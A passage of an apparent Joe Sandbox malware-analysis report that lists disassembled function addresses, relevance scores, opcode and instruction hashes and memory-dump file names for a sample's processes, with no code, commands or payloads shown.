                                • Instruction ID: 58e38e9cba4a50d5ae84a1e557c239631b5a8fd53d2e51112bd242abd5d193e5
                                • Opcode Fuzzy Hash: b708b3346364b48ebee604ced655d6edf3925669cf1f2969740fc9db3262e073
                                • Instruction Fuzzy Hash: 51115670A0954E8FDB59EF64C4655BD7BB0FF18300F0105BED419D61A1DB75A6408700
                                Function 00007FFD9B8E2E81 Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1c3f107be3e5e141b224e467421a18f9b34a54af3501107c44633201ef6bc5b2
                                • Instruction ID: baa310bbfbf6d0f18e4c6b5867d104ff76ac619209d2e4aec51c4c19f6414f85
                                • Opcode Fuzzy Hash: 1c3f107be3e5e141b224e467421a18f9b34a54af3501107c44633201ef6bc5b2
                                • Instruction Fuzzy Hash: 0201B130A1A65E4FE765FFA488695A93BE0FF59300F0645B6D408C70A3EA34E5408600
                                Function 00007FFD9B8ECC90 Relevance: .1, Instructions: 52COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 34bb8a4dcca292a942d50e5a249c9f7eca1be77bc718a3e4d4c22606292ce2ca
                                • Instruction ID: ba7cb0c67d64f1ac0645f68206619d55ffa8cc4d8eac3e7acc291ff0606490c1
                                • Opcode Fuzzy Hash: 34bb8a4dcca292a942d50e5a249c9f7eca1be77bc718a3e4d4c22606292ce2ca
                                • Instruction Fuzzy Hash: 1B110C30A2591E9FDF98EF68C4586BA77E0FF18305F11047AE41AD72A5DB34A550CB40
                                Function 00007FFD9B8ECCA8 Relevance: .1, Instructions: 51COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cbd24202d9a4b98824186c4c1d86f83bfa4ab01037e68de0913f6d5bd56b97e1
                                • Instruction ID: bc6604264d9aaa26e12181295ff752ebf2539917d3581f635a3e9f4655f17bc5
                                • Opcode Fuzzy Hash: cbd24202d9a4b98824186c4c1d86f83bfa4ab01037e68de0913f6d5bd56b97e1
                                • Instruction Fuzzy Hash: 10116130A1560E9FDBA8EFA4C4686BE77E1FF18305F10057AD41DD21A4CB34A290C780
                                Function 00007FFD9B8EB378 Relevance: .0, Instructions: 47COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ed1a49a4ca77d0b8999bf98aa941c03c329c8a7d70f0fdcbb0e3602ab67c684c
                                • Instruction ID: 6de72e2ff27e7554ed1c3213ea3adf7b444f01b56c3eded15d50fe1a2c37e958
                                • Opcode Fuzzy Hash: ed1a49a4ca77d0b8999bf98aa941c03c329c8a7d70f0fdcbb0e3602ab67c684c
                                • Instruction Fuzzy Hash: 84011E30E1990E8EEB59FBA4C46D6BE76E1FF1C305F11087AD41ED21A5DE35A650CB40
                                Function 00007FFD9B8E285D Relevance: .0, Instructions: 47COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ebfa759bbd5dd12d66a6e17dacfc4181a835565e61935c4048a52d9fa96c7f8b
                                • Instruction ID: 9b1ae5df32049d3bc1732518d842b9a59b3b418398eaa672772420c7d0d85daf
                                • Opcode Fuzzy Hash: ebfa759bbd5dd12d66a6e17dacfc4181a835565e61935c4048a52d9fa96c7f8b
                                • Instruction Fuzzy Hash: 55018430A1A55E8FE765FFA884695A97BE0FF59300F4245B6D418C61A6EE38E540C700
                                Function 00007FFD9B8EB005 Relevance: .0, Instructions: 47COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4991f852e23689ea279f4a915aaf7da9f8b79bb7ef1b4ff8c4476b20961da69b
                                • Instruction ID: dbd70c43909cd4e625f882fc7d41f932bb25a295e7bfaa600a63c4a22fec7c45
                                • Opcode Fuzzy Hash: 4991f852e23689ea279f4a915aaf7da9f8b79bb7ef1b4ff8c4476b20961da69b
                                • Instruction Fuzzy Hash: 1201D875A0E24A4FD716FB64D8A55E93BB0EF4631170641F7C04ACF0B3D938A4458750
                                Function 00007FFD9B8F12A0 Relevance: .0, Instructions: 46COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f8a77288d20a1cc6cfe33ba1f8abbff0f2cfd85606a80d4830c99f3b27cdd0cc
                                • Instruction ID: 62d11472eb3b035284aec8b315e22280a1fef87ca565b672698579d8e96bf6e4
                                • Opcode Fuzzy Hash: f8a77288d20a1cc6cfe33ba1f8abbff0f2cfd85606a80d4830c99f3b27cdd0cc
                                • Instruction Fuzzy Hash: 9B012C30A1590E8EEB99FFA4C4686BE7BE0FF18305F11047AD42ED21A5DE35A650CB40
                                Function 00007FFD9B8EC890 Relevance: .0, Instructions: 46COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3119665df96be719d83de44c20c49028f11df6ddeda978607c64b7e2c75a5aba
                                • Instruction ID: e9abe885016836c70a707030a5c7f02ace9f75b864a6341438904928d81c1b54
                                • Opcode Fuzzy Hash: 3119665df96be719d83de44c20c49028f11df6ddeda978607c64b7e2c75a5aba
                                • Instruction Fuzzy Hash: A4015A30E1591E9EEB98EF64C4686BE76E0FF18305F10087AD42ED21A4DA30A650CB40
                                Function 00007FFD9B8EC871 Relevance: .0, Instructions: 45COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cfd320070534b5c8cdb54487189d1c95cd5138c70b6b20a1e56882015643bb3a
                                • Instruction ID: 96a9e747a8131b3e576df196dd19897ae25e57a3b8f8c9cef3cda50b63fdac64
                                • Opcode Fuzzy Hash: cfd320070534b5c8cdb54487189d1c95cd5138c70b6b20a1e56882015643bb3a
                                • Instruction Fuzzy Hash: 62F08174D0A69E8FEB98AF6489692FD7BB0FF18204F41057AD818C21A1DB349650CB40
                                Function 00007FFD9B8E2EF9 Relevance: .0, Instructions: 44COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b52dc118d0c2e55a81552b4cbbfa1fc7907d1e73de6d081d3f2b331f4ed6f7be
                                • Instruction ID: c4590aaa8f7a704cf5ebd45c6d28b619a896190dd82ba60490452702b82d5524
                                • Opcode Fuzzy Hash: b52dc118d0c2e55a81552b4cbbfa1fc7907d1e73de6d081d3f2b331f4ed6f7be
                                • Instruction Fuzzy Hash: 13018470A1A64E8FD766FBB488695A97BE0EF09300F0605B3D408CB0B6DA38A6548701
                                Function 00007FFD9B8F1281 Relevance: .0, Instructions: 43COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9ebdb3421d1619e1923ba7aefedc8cc5f3ef6fe51e2c4ef525e45a9a96d67bf6
                                • Instruction ID: 0e22c07592c74291c9cfe4cc0bd797b6332570e18d0939dd1184067897cc403e
                                • Opcode Fuzzy Hash: 9ebdb3421d1619e1923ba7aefedc8cc5f3ef6fe51e2c4ef525e45a9a96d67bf6
                                • Instruction Fuzzy Hash: ADF04F31A1964E8FEB55EFA488682FE7BA0FF19210F41057AE81CC21A5DB3496548740
                                Function 00007FFD9B8EAF99 Relevance: .0, Instructions: 43COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 01c91e8cbd87a9ea2a5d97d3f870bdc3928e8a34596afed5ad5b3098bef45dae
                                • Instruction ID: a24839670b6358c28ce1e644e72d6b384d3aa91dfee91780bb66f4600c60dc9b
                                • Opcode Fuzzy Hash: 01c91e8cbd87a9ea2a5d97d3f870bdc3928e8a34596afed5ad5b3098bef45dae
                                • Instruction Fuzzy Hash: B6018470A5E64E5FE766BB7488695A97BE0EF09300F0644F3D409CB0B6E938A5448701
                                Function 00007FFD9B8EAF3A Relevance: .0, Instructions: 43COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 476f4ed18455db5a41d87154c4fb4bb15c583bf1b77929da77b2762a7ad8a653
                                • Instruction ID: 5f173093df180f2f63f22d413117f85a1ddc77714d41defd20963306ee394527
                                • Opcode Fuzzy Hash: 476f4ed18455db5a41d87154c4fb4bb15c583bf1b77929da77b2762a7ad8a653
                                • Instruction Fuzzy Hash: 9C01F470E1A50E9EEB65FFB4C8685B97BE0FF0C700F0108B6D419CB0A1EE34E2408640
                                Function 00007FFD9B8E05D8 Relevance: .0, Instructions: 43COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 38e5d44e5104efeb6bdbf917c13587a0bd180473881e0256881f7f823a0bfef4
                                • Instruction ID: 2d8fce518fb7eb8711953c98e38fe50ac3790504bed31703d07ebe2e3cc70a0c
                                • Opcode Fuzzy Hash: 38e5d44e5104efeb6bdbf917c13587a0bd180473881e0256881f7f823a0bfef4
                                • Instruction Fuzzy Hash: 49014F30A0950E8FDB9CFF65C0646B977E1FF5C305F51447ED41AC62A4CA35A691CB40
                                Function 00007FFD9B8E1C8D Relevance: .0, Instructions: 43COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c45d5788f8a68d9004c56a0f6a974c5d6059461f5c5bb54f8b90c6c6dd65fcaf
                                • Instruction ID: d17ffa02a73104ab1157d4db0902b06b70b779cc8d339e3aa471f638132289fb
                                • Opcode Fuzzy Hash: c45d5788f8a68d9004c56a0f6a974c5d6059461f5c5bb54f8b90c6c6dd65fcaf
                                • Instruction Fuzzy Hash: CC01D630A0A64E8FDB58FF64C4655B93BA0FF59300F45007AD408C61A1DB35D550C740
                                Function 00007FFD9B909390 Relevance: .0, Instructions: 42COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fbf36aaf7ba9c72cf25966751393972358c369963ed9a8ed0becb3937de06c11
                                • Instruction ID: 589edde6de25e3c0703aa7abc7053af8daaea68b0596a9e94d08350352221a8e
                                • Opcode Fuzzy Hash: fbf36aaf7ba9c72cf25966751393972358c369963ed9a8ed0becb3937de06c11
                                • Instruction Fuzzy Hash: 59014B34A2991F9FEB50FBA8845C6BA77E0FF58300F010972E41DC20A5EA34A2808B40
                                Function 00007FFD9B8E0610 Relevance: .0, Instructions: 42COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 47fda7a1f9f5b4e2d06a1d13ddf26762f72877eb100db2c3e0eb40f520f81eb2
                                • Instruction ID: ea48ab15996b3b892b9e92f490a7c29d2b7b43dbf739f8a3c4e01f0a54210922
                                • Opcode Fuzzy Hash: 47fda7a1f9f5b4e2d06a1d13ddf26762f72877eb100db2c3e0eb40f520f81eb2
                                • Instruction Fuzzy Hash: 2C016D30A19A0E8FEB6DEFA4C4686B973A0FF1C305F11047ED41EC61E5DE35A650C600
                                Function 00007FFD9B8E0608 Relevance: .0, Instructions: 42COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a38d21fd3523227f24ce34baa820aca783003e50f84dd104d827559a9e357e38
                                • Instruction ID: 7c1f771614b9bd2814b7c33925bd80281ae1b04816e050d1b7e9e418117bf0ca
                                • Opcode Fuzzy Hash: a38d21fd3523227f24ce34baa820aca783003e50f84dd104d827559a9e357e38
                                • Instruction Fuzzy Hash: BC018630A1560ECADB5DFFA4C8696B973A1FF1C305F11087ED41ED21E5DE35A690CA00
                                Function 00007FFD9B8EB068 Relevance: .0, Instructions: 40COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ad8947f65119e64a6410b6b29ed0f927579b1e58ce9c0694329ba62c7a39b9ff
                                • Instruction ID: 14f8596f755a9a328a2cf8f25b1aedc6461d759684f522867cef7f024792bf39
                                • Opcode Fuzzy Hash: ad8947f65119e64a6410b6b29ed0f927579b1e58ce9c0694329ba62c7a39b9ff
                                • Instruction Fuzzy Hash: DAF01D30B5950E8AEB68EFA4C465ABD7BA0EF18304F51087AE41ED31A5DE356A50C681
                                Function 00007FFD9B8EC4B5 Relevance: .0, Instructions: 40COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7f71b824df7f4f7a2e505f9f9814c8622fb35b779668a07415f59b2fcd7a8ab8
                                • Instruction ID: 184c261e73172710c4857fb8e0e04a40ced5101b48ac13f43bfacce84bc65ec2
                                • Opcode Fuzzy Hash: 7f71b824df7f4f7a2e505f9f9814c8622fb35b779668a07415f59b2fcd7a8ab8
                                • Instruction Fuzzy Hash: B1F06830E0964E8FDB59EF64886D2FE7BF0FF19300F41057AD419D21A1DB3496548B40
                                Function 00007FFD9B8E11B0 Relevance: .0, Instructions: 38COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3c160ed1868360d118e8dac9bbe380319a7f17216ea7f6fe14acfa17e9dd6388
                                • Instruction ID: 1497721d6968b656e7cd04857498624191474f905379dbdfb7585e2948b84ec2
                                • Opcode Fuzzy Hash: 3c160ed1868360d118e8dac9bbe380319a7f17216ea7f6fe14acfa17e9dd6388
                                • Instruction Fuzzy Hash: 66F0C870E1A55F49FBACBBA498287BD76E0FF59301F01143DE41ED20E1EF281250C640
                                Function 00007FFD9B8F28F5 Relevance: .0, Instructions: 34COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d09e5938fff6d90e84e793314a3591ad9b46834b167697fc7c35b3edc9ccde7a
                                • Instruction ID: 2f8732afd4d51279df71ee0c77bad07720ccbb92ef6142e7162abcaca90ece32
                                • Opcode Fuzzy Hash: d09e5938fff6d90e84e793314a3591ad9b46834b167697fc7c35b3edc9ccde7a
                                • Instruction Fuzzy Hash: DCF0AE30B5A24E8BEB655FB088256FD3BA0FF45300F821479F41DC21F2EE3C6A148641
                                Function 00007FFD9B8E2779 Relevance: .0, Instructions: 33COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b36fc6b53db3e9b4433689332956778d7fc76adda95492c4f98694c9cbdd80c1
                                • Instruction ID: 036614b9e5716c8f4069888651f131635530df57c44671625c86c617cf9c5c59
                                • Opcode Fuzzy Hash: b36fc6b53db3e9b4433689332956778d7fc76adda95492c4f98694c9cbdd80c1
                                • Instruction Fuzzy Hash: F1F0623090E78D8FDB5AAF6488682B93B61FF06201F4505BAE419C51E2DF389554CB41
                                Function 00007FFD9B8E27ED Relevance: .0, Instructions: 31COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 76fb3096b396249c92e54f4cdfe8c3e7e35cfd986018f8d1e84d0db82218e284
                                • Instruction ID: 1d58e8187a093647aefce5a22b19a45d76e79a12d206e6a6e68d82ff426a20f0
                                • Opcode Fuzzy Hash: 76fb3096b396249c92e54f4cdfe8c3e7e35cfd986018f8d1e84d0db82218e284
                                • Instruction Fuzzy Hash: 04F09031A0E78E8FEB6DAFA488251B93BA0FF09305F4504BED809C61E6EB399554C741
                                Function 00007FFD9B8EBDD4 Relevance: .0, Instructions: 30COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7d07d83136e2ac091e2f690193ef85581e1b8496084c732499e07b70f0c7e7f4
                                • Instruction ID: 6bd68abdbbc380df46761526ec213ddf027ac46eb7392250d8d94d6c38ce96ce
                                • Opcode Fuzzy Hash: 7d07d83136e2ac091e2f690193ef85581e1b8496084c732499e07b70f0c7e7f4
                                • Instruction Fuzzy Hash: 2BF02670E1651D9EE7A9EB68C8557E9B6B1FF4C300F5101F5940DD21A5DF342A808F01
                                Function 00007FFD9B8E0F7C Relevance: .0, Instructions: 26COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8bdf9cc9988be014845fadca18d9f19c290732e8d1858d335096ae43098a49fc
                                • Instruction ID: ec74173379f728a4a7a7a0900c9833b1b6535e51cc1a1d5170ae367e3a9575e3
                                • Opcode Fuzzy Hash: 8bdf9cc9988be014845fadca18d9f19c290732e8d1858d335096ae43098a49fc
                                • Instruction Fuzzy Hash: 8FF0DA30A1950D8BEB64EB54C855BEDB3B1FB58701F6146A5D009E7299DE386E818F40

                                Non-executed Functions

                                Function 00007FFD9B8EF2C4 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1806151207.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_7ffd9b8e0000_blockfont.jbxd
                                Similarity
                                • API ID:
                                • String ID: +$9$=$j
                                • API String ID: 0-1068894341
                                • Opcode ID: 89661796e31e27469f2aa9d23ad4aa28ceb5952a33cc8e01f23a6b6544fe6f57
                                • Instruction ID: 52ec6ab1aa543048ae0cac1fef7b1c6d614c33bac3143f36e16d4302e363f343
                                • Opcode Fuzzy Hash: 89661796e31e27469f2aa9d23ad4aa28ceb5952a33cc8e01f23a6b6544fe6f57
                                • Instruction Fuzzy Hash: 4541C770A1966E8FDBA8EF54D8A47EDB7B1EF58311F1001EAD40E97291CB346A81CF44

                                Executed Functions

                                Function 00007FFD9B8D3585 Relevance: .3, Instructions: 295COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.1875434212.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7ffd9b8d0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fe0472f541fa33505e2e196bc8af748aa1f9a679987a144a385768b61837f17c
                                • Instruction ID: 9d265e47ed175ebf1ef40be19b3c2e9df0a428f33c5a708d812711370b9a7508
                                • Opcode Fuzzy Hash: fe0472f541fa33505e2e196bc8af748aa1f9a679987a144a385768b61837f17c
                                • Instruction Fuzzy Hash: 3FA1BF71A0994E8FEB98DBA8D8257AD7BE1FF99310F44427AD00DD72E6DFB468018740
                                Function 00007FFD9B8DF809 Relevance: 2.6, Strings: 2, Instructions: 146COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.1875434212.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7ffd9b8d0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID: .$R
                                • API String ID: 0-3105842054
                                • Opcode ID: 7c0af818f82fede20383450e1ace1d269b9195fca522a1915aa5cf3fdb5257c1
                                • Instruction ID: dd619aa0d2bb5103ed17de9c35c1a2d492ddf3de79ad102506cd6548ced64544
                                • Opcode Fuzzy Hash: 7c0af818f82fede20383450e1ace1d269b9195fca522a1915aa5cf3fdb5257c1
                                • Instruction Fuzzy Hash: ED512C71E19A1E8BDBA8DB18CC657A9B3B1FF58305F5102FA900DE3291DE346A81CF40
                                Function 00007FFD9B8DEB95 Relevance: 2.6, Strings: 2, Instructions: 64COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.1875434212.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7ffd9b8d0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID: #$}
                                • API String ID: 0-437702028
                                • Opcode ID: c2c04a9f05cf03fb2a389f110bfa9da2f1f6e6f446a5056cb1dc232bbc04bee8
                                • Instruction ID: be0b83fc440ddd90c61b402235cea3d9d197df2f5a5c666a032c52a6e656a859
                                • Opcode Fuzzy Hash: c2c04a9f05cf03fb2a389f110bfa9da2f1f6e6f446a5056cb1dc232bbc04bee8
                                • Instruction Fuzzy Hash: AD21EA30E5952E8FDF68DF54D8A5BF9B7B1EB58312F1102BAD40DA2291DB346A80CF40
                                Function 00007FFD9B8E3808 Relevance: .5, Instructions: 519COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.1875434212.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7ffd9b8d0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 19dd91b2e358d6436b9538f50a30e47cbd34bda8e48976e2f33703f263b62def
                                • Instruction ID: d3b47d36c556497b6b5b391d4c2ec1c21b8667394bbf09e6902997f3747a7222
                                • Opcode Fuzzy Hash: 19dd91b2e358d6436b9538f50a30e47cbd34bda8e48976e2f33703f263b62def
                                • Instruction Fuzzy Hash: 2641C952A0F7D64FE727A7788C791E97FB0EF16214B0904FBD098CB0A7E918A948C341
                                Function 00007FFD9B8DDD49 Relevance: .4, Instructions: 392COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.1875434212.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7ffd9b8d0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
